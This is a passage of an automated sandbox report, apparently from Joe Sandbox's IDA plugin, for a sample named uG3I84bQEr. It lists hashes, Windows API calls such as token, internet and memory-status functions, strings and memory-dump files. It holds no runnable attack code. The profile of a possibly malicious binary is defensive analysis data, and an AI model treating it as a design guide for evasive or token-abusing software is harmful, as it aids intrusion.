                                                            • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                            • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                            • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00402231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                            • GetStockObject.GDI32(00000005), ref: 00402258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                            • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                            • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                            • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 0045871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                            • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                            • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                            • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %I
                                                            • API String ID: 0-63094095
                                                            • Opcode ID: e9c0633a200649a430a81acd596a64955a70f18c5ba43c97e28f2c6008cd488f
                                                            • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                            • Opcode Fuzzy Hash: e9c0633a200649a430a81acd596a64955a70f18c5ba43c97e28f2c6008cd488f
                                                            • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xbL$xbL
                                                            • API String ID: 3653519197-3351732020
                                                            • Opcode ID: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                                                            • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                            • Opcode Fuzzy Hash: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                                                            • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: pow
                                                            • API String ID: 0-2276729525
                                                            • Opcode ID: 32eddd0a66362894a2044272ade555a7dbf8a64bac749848bb59f41814e21b4b
                                                            • Instruction ID: 17375c943f491bb0c76ee03285b07e394137fbe20093871bcb4d3d2008b26fd3
                                                            • Opcode Fuzzy Hash: 32eddd0a66362894a2044272ade555a7dbf8a64bac749848bb59f41814e21b4b
                                                            • Instruction Fuzzy Hash: 7F514961A0820797CF157B1CC94237A7BE0DB50750F208DF8E495822B9EF368DD5EB52
                                                            APIs
                                                              • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • __wcsnicmp.LIBCMT ref: 0046B02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
                                                            • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                            • Opcode Fuzzy Hash: 0bf4b0a76cc3f132cb7bcf77adcf66fb9d1cefc0e8af144e1018bc7f00ea2780
                                                            • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00412968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                            • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                            • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                            • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: DdL$DdL
                                                            • API String ID: 1473721057-91670653
                                                            • Opcode ID: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
                                                            • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                            • Opcode Fuzzy Hash: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
                                                            • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                            APIs
                                                            • _memset.LIBCMT ref: 0047259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                            • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                            • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                            • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                            • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                            • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                            • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                            APIs
                                                            • _memset.LIBCMT ref: 00462911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 54ef1e09961f951debfae4671dd413b71e0a8fc77559d8c19ec6c00eaf90e7d6
                                                            • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                            • Opcode Fuzzy Hash: 54ef1e09961f951debfae4671dd413b71e0a8fc77559d8c19ec6c00eaf90e7d6
                                                            • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                            • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                            • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                            • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                            APIs
                                                              • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                              • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                              • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                            • GetSysColor.USER32(00000012), ref: 00486C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                            • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                            • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                            • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                            • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                            • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                            • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                            APIs
                                                            • _memset.LIBCMT ref: 00462A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                            • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                            • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                            • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                            • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                            • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                            • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                            Strings
                                                            Memory Dump Source
